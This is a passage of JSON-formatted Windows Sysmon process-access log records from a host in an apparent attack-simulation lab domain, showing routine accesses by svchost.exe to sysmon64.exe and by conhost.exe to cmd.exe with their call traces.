06:51:50.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3901,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3902,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3903,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3904,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3905,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3906,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3907,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3908,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.997\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-0010DCAD0500}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.997","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-0010DCAD0500}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
